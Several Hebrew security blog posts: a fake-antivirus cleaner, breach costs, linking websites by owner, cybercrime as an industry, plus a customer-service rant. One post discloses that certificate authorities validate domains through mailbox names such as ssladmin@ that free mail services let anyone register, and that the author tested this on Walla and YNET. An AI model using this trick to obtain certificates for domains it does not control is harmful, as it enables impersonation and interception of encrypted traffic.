כפיר טויטו מחברת קומסקיור שלח לי הודעה על כך ש-ESET הוציאה כלי מעניין שאמור לנקות את כל אותם אנטיוירוסים מתחזים.

ציטוט:

" כלי זה יצא בעקבות ריבוי מקרה ההונאה של תוכנות אנטי וירוס מזויפות המתחזות לתוכנות לגיטימיות ותוקפות גולשים תמימים, בשנים האחרונות, ובמיוחד בשנת 2009, הייתה עליה חדה בנוזקות המתחזות לתוכנות אנטי וירוס לגיטימיות.

תופעה זו, אשר זכתה לכינוי ScareWare בפי מומחי אבטחת מידע בעולם, ממשיכה לצמוח ולפי מחקר שנערך ופורסם לאחרונה על ידי גוגל, 15% מכלל הנוזקות ברשת הן תוכנות אנטי וירוס מזויפות – בשנה האחרונה הייתה עליה של 400% בנוזקות אלו."

הורדת ERACleaner.

הוצאות על אבטחת מידע בארגונים רבים נתפסת כצעד הכרחי בגלל תקנים שהם חייבים לעמוד בהם.

כ-CISO קל לנו להראות שאנו חייבים לבצע הוצאות מסויימות כיוון שאם לא יבוצעו אז לא נעמוד בתקנים שונים שלעיתים הארגון חייב לעמוד בהם. עם זאת, בהרבה מקרים קשה ל-CISO באירגון לייצר מצב בו רואים ROI (החזר על הוצאה) בכסף שמושקע באבטחת מידע.

בינואר 2009 התפרסם שחברת Heartland Payment Systems סבלה מהתקפה שגרמה לה לאיבוד מידע.החברה שעוסקת בסליקת כרטיסי אשראי הצהירה שלא מדובר במידע מהותי כגון Social Security Numbers אך כן נגנבו 130 מיליון מספרי כרטיסי אשראי וכן שמות המחזיקים אותם. (http://www.msnbc.msn.com/id/28758856/).

הפרצה הזו עלתה לחברה מעל 140 מליון דולר עד עכשיו:

60 מליון דולר הסדר עם חברת ויזה, 3.5 מילין דולר לאמריקאן אקספרס, 26 מיליון בתביעות משפטיות כאלה ואחרות.

עוד 42 מיליון דולר החברה שמה בצד לצורך תשלומי תביעות עתידיות.

עלות נוספת משמעותית היא הפסד הכנסות מעסקים – חברות פשוט הפסיקו להשתמש בשירותי החברה בשל הפריצה.

כשרואים את הסכומים מבינים די בקלות שניתן להצדיק הוצאות על אבטחת מידע כיוון שיש להם ROI ברור: כל עוד לא פרצו לא הפסדנו כסף אך גם כשכבר פורצים חס וחלילה – ככל שנאבד פחות מידע, ככל שמערכות שונות יגבילו את התוקף ניפגע פחות כתוצאה מתשלום פיצויים.עכשיו נשאר רק להציג את זה נכון למקבלי ההחלטות

חבר שאל אותי אתמול על כלי שמאפשר למצוא מספר אתרים השייכים לאותם בעלים.

בעבר מצאתי תוכנה חביבה שהיתה עושה את זה לא רע אבל התחלתי לחשוב איך אפשר לזהות את העניין.

הברור מאליו – רישום של שם הדומיין. הבעיה היא שיש הרבה אנשים שרושמים את הדומיין ללא זיהוי או בלי זיהוי אמיתי.

דרכים נוספות:

כל תוסף סטטיסטיקות או פרסומות והרבה תוספים אחרים מגיעים עם זיהוי ייחודי של בעל האתר. אחת הבעיות עם תוספים כמו אדסנס ואנאליטיקס הם שזיהוי המשתמש ייחודי לבעל האתר ולא לאתר עצמו.

כיוון שבכל האתרים יש את אותו משתמש (רוב האנשים לא טורחים לייצר לעצמם כמה חשבונות אנאליטיקס ואדסנס) ניתן לזהות כך כמה אתרים מפעיל אותו אדם.

דרך נוספת היא לבדוק כמה אתרים שיושבים על אותו IP (כמובן שזה ממש לא מדוייק. יכול להיות שזה שרת HOSTING ואז האתרים לא קשורים זה לזה).

ישנו אתר חביב שעושה את העניין פשוט: http://spyonweb.com.

אם תבדקו את האתר שלי שם תוכלו לראות עוד כמה וכמה אתרים שהייתי מעורב בהם בצורה כלשהי: http://spyonweb.com/guym.co.il.

נסו לבדוק אתרים אחרים שאתם מכירים. הרבה פעמים תופתעו מהתוצאות.

חבר שלי מחפש עובדים.
פרטים פה:

יובל דרור צייץ על זה ב-TWITTER והפרסומת הזאת מדגישה את זה.

אז אם פרטיות לא מעניינת אתכם (וזה בסדר מבחינתכם גם כשאתם יודעים מה גוגל יודעת עליכם), כדאי להוריד..

למי שעוד לא שמע – יש תחרות האקינג מגניבה לחלוטין שמארגן צוות Offensive Security.

התחרות נקראת How strong is your Fu? והיא נראית מגניבה לגמרי.

פרטים נוספים פה:

http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/

ניסיתי היום לברר מחיר לחבילה של אינטרנט, טלפון וטלוויזיה ב-HOT.

נכנסתי לאתר שלהם והופתעתי לראות שיש אפשרות לקבלת מענה בצ'אט. חשבתי לעצמי "הממממ… אפשר לכתוב על זה אח"כ".

תיארתי לי מראש שזה הולך להיות בעייתי אבל מה לא אעשה בשביל קוראי האהובים?

אז שינסתי מותני, אזרתי אומץ ולחצתי על הכפתור.

קודם כל – אני עם FIREFOX והאתר עבד. הפתעה נעימה

פתאום הפתעה פחות נעימה: כל הדפדפן הוקטן למימדים מזעריים ונפתח חלון צ'אט זוועתי.

ענתה לי אשת מכירות והתחלנו להתכתב.

אני כתבתי משפט בשנייה או שתיים, אולי שלוש. אז המתנתי 50-60 שניות ואז הופיעה כיתוב שמראה שאשת המכירות עונה. כן, לקח לה כמעט דקה לענות.

אם תהיתם: זה לא היה חד פעמי. בכל פעם זמן ההמתנה לתגובה היא בין 40 שניות במקרה הטוב ל-60 שניות במקרה הפחות נחמד.

כל שאלה הייתי צריך לנסח כמה פעמים. רוצים דוגמאות? טוב..

גיא: אני רוצה לקבל מחיר ללא התחייבות.

שרי: חבילה של כל הערוצים ואינטרנט עד 12M ו1000 דקות לטלפון תעלה לך 260 ש"ח בהתחייבות ל-36 חודשים. התקנה 100 ש"ח.

גיא: אני לא רוצה התחייבות. אפילו לא לחודש.

שרי: בלי התחייבות תשלם מחיר מחירון.

גיא: מה מחיר המחירון?

שרי: חבילת בסיס + 6 חבילות 260 ש"ח. לא כולל ממירים.

גיא: כמה עולה שכירות לממירים?

לא היתה תגובה מעל 90 שניות ואז התעצבנתי וניתקתי.

בקיצור: אי אפשר לקבל שירות סביר באמצעות צ'אט. אי אפשר לקבל תגובות סבירות כי הנציגה לא קוראת מה אתם רוצים. היא ממלאת אתכם בהצעות מוכנות ואם צריך משהו שונה… זו בעיה.

מצד שני, יכול להיות שגם בשיחת טלפון זה ככה. אני לא בטוח שאתקשר לבדוק.

אני אשתדל לעדכן במהלך היום, בינתיים מעניין אותי "עתיד המוסיקה" ברשת.

בטח אעבור לאולמות אחרים במהלך היום.

רונית ארבל (המנהלת העסקית של אייל גולן) תיארה את העבודה שמתבצעת כדי לקדם את אייל גולן בסלולר והיה מאוד מעניין לשמוע שזאת עבודה ברמה יומיומית.

טל ברמן בא ושם את הדברים על השולחן – יש פה השתלטות של התאגידים הגדולים והוא דיבר בצורה יפה ומעניינת. הטענות רציניות.

יוני בלוך מגיב – שיר טוב זה לא מספיק. צריך משהו מעבר לזה כדי באמת להתפרסם. קליפ איכותי, רעיון ייחודי ולא רק מוסיקה טובה.

ארבל מוסיפה שגם אמן כמו ריטה זה לא היה בהתחלה קל למכור לסלולר וזאת היתה עבודה קשה לשווק אותה.

יאיר ניצני – אינטרנט זה כמו רשת החשמל. אף אחד לא הבטיח שהאינטרנט תהיה המושיע של האמנים הגרועים. יאיר אומר שהרדיו מחליט בשביל אנשים מה שומעים וארבל אומרת שרדיו זה מקום שלישי או רביעי. יאיר אומר שאם השיר גרוע הוא בכל מקרה לא יצליח.

יאיר שואל אם מישהו שאין לו רונית ארבל עדיין יכול להיות ראשון? גיא מפלאפון עונה שיש להם כמה שערים (כשאיילה צורך מקשה שיש רק שער אחד, הוא עדיין עונה שיש כמה שערים). גיא אומר שהם מנסים להעניק ללקוח חוויה טובה ולכן משנים את הדברים שחושבים שיקלעו לדעת הקהל.

איילה: למה אין חנות מוסיקה דיגיטלית של כל החברות יחד? יאיר עונה שהחברות לא מצליחות להגיע להסכם (הוא אומר: זה כמו שלום עם הערבים). ישנה השוואה לאייטיונז ואפל.

יוני – ישראל מיוחדת בעניין הזה. היא מאוד מתקדמת וגם מאוד מיושנת. טל – העניין הוא הפתרון המלא שאפל נותנת ומחמיא לחברות הסלולר שהן עושות את זה טוב.

יוני מעלה נקודה חשובה – אין יותר ערך לסאונד טוב בשל העניין שבטלפון שומעים פשוט גרוע.

הפאנל היה מעניין ממאוד והוא מראה כמה יש אנשים שמחוברים וכמה כאלה שלא.

לסיום קליפ של יוני בלוך – קליפ אינטראקטיבי ומגניב לחלוטין

דה מרקר שיחקו אותה והחליטו לתת לבלוגרים נבחרים (ואני בינהם) 10 כרטיסים לכנס COM.Vention.

פרטים על הכנס פה: http://comvention.themarker.com.

מישהו רוצה להגיע?

עריכה – מצטער, אין כרטיסים. מי שקיבל מייל – יש לכם.

גילוי נאות: הפוסט הזה הוא נגזרת של הרצאות שאני מעביר לגופים שונים. אם התחום רלוונטי לגוף בו אתם עוסקים, ניתן להזמין הרצאה כזו (הרצאה של כשעתיים עם הדגמות) או סדרת הרצאות בנושא.

בחודשים האחרונים אני רואה יותר ויותר שינויים בעולם של פושעי הרשת ולכן עידכנתי את ההרצאה שלי והחלטתי לכתוב גם כאן על זה ממש בקצרה.

הקדמה (או דעה לא מחייבת):

בהתחלה האקרים היו שובבים.

המעשים שעשו נחשבו "מעשי שובבות" כשהדבר העיקרי שהניע את אותם חבר'ה היה הדחף לדעת, ללמוד, לפתור בעיות. אם אותם חבר'ה ניצלו את הידע שלהם כדי להתריע על בעיות ולעזור לפתור אותן, יחד איתם התפתחו פושעי רשת. תקראו להם פושעים, פושעי רשת, קראקרים או BlackHats, בסופו של דבר הם פושעים.

בימים הראשונים של הרשת BlackHats עשו דברים בעיקר בשביל עצמם כשהמוטיבציה היתה גניבת חשבונות, כסף וכ"ו. הבעיה היתה שאותם חבר'ה לא היו מעורים בעולם הפשע האמיתי. הם צמחו בעקבות ההזדמנות לפשוע ברשת ולהיות עבריינים אנונימיים וניסו להבין איך אפשר לעשות מזה כסף.

אז איך הם הרוויחו? סחר במידע, משלוח SPAM, סחיטה ע"י גניבת חשבונות והחזרתם תמורת כסף, סחיטה ע"י התקפות Denial Of Service ובעוד דרכים רבות. מה שמשותף לכל זה הוא אי הארגון.

הקראקרים האלה פעלו בעצמם ולעצמם. הבעיה העיקרית שלהם היתה איך להמיר את הכסף הוירטואלי והאלקטרוני לכסף אמיתי בלי להתפס והם השתמשו במגוון שיטות שלא אפרט לעומק (כי רובן עובדות גם היום).

חלק מהשיטות:

העברת כספים למדינות שאין בינהן קשרים דיפלומטיים ושיתוף פעולה עם גורם באותן מדינות.

שיתוף פעולה עם "מלביני כספים".

הפעלת Mules – פושעים שמתמחים בהוצאת הכסף הוירטואלי והמרה לכסף אמיתי בניקוי ה"קופון" שלהם.

מפושע לפשע מאורגן

המפנה האמיתי חל כשעולם הפשע המאורגן הבין שיש באינטרנט פוטנציאל.

הכלים של פושעי הרשת התקדמו, הסוסים הטרויאנים נכתבים בצורה טובה יותר, יש שווקים בהם ניתן לרכוש שירותים משלימים.

יש כלים מוכנים שניתן להשתמש בהם:

1. סוסים טרויאנים – יש לא מעט מקומות בהם ניתן לרכוש סוסים טרויאנים. המוכר נותן על הסוס "אחריות" כנגד גילוי של אנטיוירוסים לפרק זמן מסויים.

2. התקנה – יש שווקים בהם ניתן לרכוש ולמכור "התקנות" אוטומטיות של סוסים. אתרים אלה מרכזים קראקרים שמצליחים לפרוץ לאתרי אינטרנט וכן אנשים שכותבים אקספלוייטים לחולשות ברכיבים שבאמצעותם ניתן להתקין את הסוסים.

3. שירות – ישנם נותני שירותים שיכולים להציע לפושע הרשת הטירון התקנה של שרתי Command and Control, התקנת אקספלוייטים, הגדרות וכ"ו. כל מה שנשאר לפושע לעשות זה למקם iframe בתוך דפי ההדבקה שלו. הדפים יכולים להיות פרצות באתרים ידועים או Land Pages של חיפושים טובים או SPAM שמכיל קישור לאתר הדבקה.

4. חבילות מוכנות – ניתן בכל זמן נתון לרכוש חבילות של מליוני כתובות דואר אלק', חבילות של אלפי כתובות GMAIL, חבילות של כרטיסי אשראי גנובים, כבר הזכרתי סוסים טרויאנים, אספלוייטים וכל דבר אחר שיעזור לכם בהקמת רשת ההדבקה שלכם.

רוב האתרים והשירותים מנוהלים ע"י "מומחים" מטעם גופי הפשע המאורגן. פושעי הסייבר עובדים במודע או שלא במודע בשביל פושעים מהעולם האמיתי, הלא מקוון.

השינוי האמיתי הוא "מפעל הפשע" המקוון. הדברים נהיו קלים יותר ללימוד, קלים יותר לביצוע, קלים יותר למסחר.

התוצאה: קל יותר להיות פושע רשת.

אני אסביר ואתחיל דווקא מהסוף.

תארו לכם מצב בו ה-geek שרוצה להרוויח מחליט לבצע פשע. אם בסוף הוא צריך ללכת ולהסתכן ולאסוף בעצמו את הכסף מדובר במשהו מאוד מרתיע. גם אם יש מישהו שעושה את הדבר בשבילו הוא עדיין צריך להתנהל מולו והגיק החנון שלנו לא רוצה את זה. הוא לא רוצה להסתכן בשום צורה.

נחזור קצת אחורה. איך ילמד הגיק שלנו לכתוב סוסים טרויאנים? להשוות אותם מול חתימות אנטיוירוסים? להבין מה זה רוטקיט ולמה צריך אותו? הוא יכול לשבת וללמוד שנים או לקבל דוגמאות מוכנות כמו שזה קורה היום וללמוד מהן.

ואם הוא לא ממש רוצה לבצע פשעים ועדיין צריך כסף? הוא יכול לתת שירותים לפושעים. לכתוב טרויאנים או חבילות אקספלוייטים וכ"ו ולקבל עליהן את התמורה.

לאן הולך הפשע המקוון?

אנו רואים כבר היום שעולם הפשע הקיברנטי משתנה.

צומחים יותר ויותר מומחים שמתמחים בנושאים ספציפיים במקום האקרים "יודעי הכל". אם עד היום אנחנו מגדירים האקרים טובים ככאלה שמסוגלים לעשות בערך הכל, שוק הפשע המסחרי נוטה לכיוון אחר.

מומחים בתחומים שונים הופכים להיות רלוונטיים יותר מ"יודעי כל" כיוון שהם זולים יותר ומקצועיים יותר בתחום העיסוק שלהם.

תחומי ההתמחות: Web Applications, Social Engineering, Software Cracking and Reversing, Trojan Writing, Exploit Packs – אלה הם עיקרי התחומים בהם יעסוק פושע סייבר טכנולוג.

לצידם של המומחים האלה ישנם: מומחי ריגול ולוחמת רשת, מומחי כתיבת תסריטי התרחשות, אנאליסטים.

תחומי התמחות נוספים קיימים ללא טכנולוגים: הלבנת כספים, גניבות זהות, חיבור לפשע המאורגן הלא מקוון, ליווי מקוון לפשעים רגילים.

כל המומחים האלה יוצרים יחד את העובדה הפשוטה: הפשע בסייבר מתחזק.

הסוסים הטרויאנים הולכים ונהיים חכמים יותר, חבילות האקספלוייטים נהיות איכותיות יותר, קל יותר לקבל כסף על העבודה ויש הרבה פחות סכנה לבצע פשעי רשת.

בקיצור – משתלם היום להיות פושע סייבר פשוט כי קל ללמוד את זה ואתה מסתכן פחות מאשר בעבר.

מישהו יכול לארגן לי הזמנה לכנס COM.Vention של דהמרקר?

פרטים על הכנס פה: http://comvention.themarker.com...
נראה מעניין ולא בא לי להוציא 450 ש"ח..

לפני כמה ימים יניב פלדמן מ-NewsGeek שלח לי את הכתבה הזו: http://keyboardcowboy.ca/2010/04/whos-letting-me-become-ssladmin.

הפוסט הזה מדבר על העובדה שניתן לייצר לעצמכם SSL Certificate אם יש לכם את שם התיבה המתאים בקלות.

הסבר:

חלק נכבד מספקי הסרטיפיקטים מאפשרים לכם לייצר סרטיפיקט בקלות אם יש לכם תיבת דואר אסטרטגית בארגון.

מה זו תיבה אסטרטגית? טוב ששאלתם.

יש את הברורות: admin, administrator, root וכ"ו. תיבה נוספת וקצת פחות נפוצה היא ssladmin וגם ssladministrator.

אז מה עשיתי?

הלכתי אל Rapidssl ובדקתי אילו שמות הוא מחשיב כשמות "בטוחים" להם אפשר לספק Certificate בלי בדיקות מיוחדות.

התוצאה היתה מפתיעה:

admin@, administrator@, hostmaster@, info@, is@, it@, mis@, postmaster@, root@, ssladmin@, ssladministrator@, sslwebmaster@, sysadmin@, webmaster@some_domain_name

בעוד חלק נראה ברור שיהיו תיבות של מנהלים, חלק מהתיבות האלו בכלל לא בטוח שמישהו שם אליהן לב או מגדיר אותן כבעייתיות.

מה תוכלו לעשות עם Certificates בשליטתכם? התקפות MITM על התיבות שלהם כשהכל קורה ב-SSL נעול ויציב. התחזות. תהיו יצירתיים.

אז מה עושה בלוגר שרוצה לבדוק מה קורה עם הדברים האלה בארץ? נכון. הלכתי לפתוח לעצמי תיבות מייל בכמה שירותים.

חלק יצאו טובים וחלק בעייתיים.

Walla:

הצלחתי לפתוח ללא בעיה תיבה בשם ssladministrator וגם לשלוח אליה וממנה מייל בלי שום בעיה.

YNET:

תיבות פנויות:

ועוד:

מה שמוזר בעניין הוא שלא הצלחתי לקבל לתיבה הזו דואר אבל כן הצלחתי לשלוח ממנה דואר בלי בעיה. אולי קבלת הדואר לכתובת הזו היתה בעייתית ואולי השירות לא ממש מהיר..

בקיצור, אם הייתי רוצה לנצל את העניין הייתי צריך כנראה לבקש שאת ההתכתבויות הבאות לאחר הפניה לפתיחת לקוח נמשיך במייל הרגיל שלי בחברה (הייתי פותח שם תיבת דואר נוספת).

בקיצור, שני האתרים האלה ואני מניח שרבים אחרים פגיעים בצורה כזו או אחרת לעניין.

ברגעים בהם שלחתי את הפוסט, שלחתי לינק אל abuse@walla.co.il, abuse@ynet.co.il. ב-WALLA לא קיימת כתובת כזו. מעניין לאן אפשר לשלוח

עדכון:

בתחילה כתבתי גם על תפוז אך קיבלתי הרגע מייל מהם (השם של השולח שמור במערכת).

מתברר שהתיבות אצלהן אינן תיבות דואר חיצוני ולכן אין כאן משמעות לשם שנפתח וברור שאין פגיעות.

ניתן לשלוח שם הודעות פנימיות בלבד ולא חיצוניות.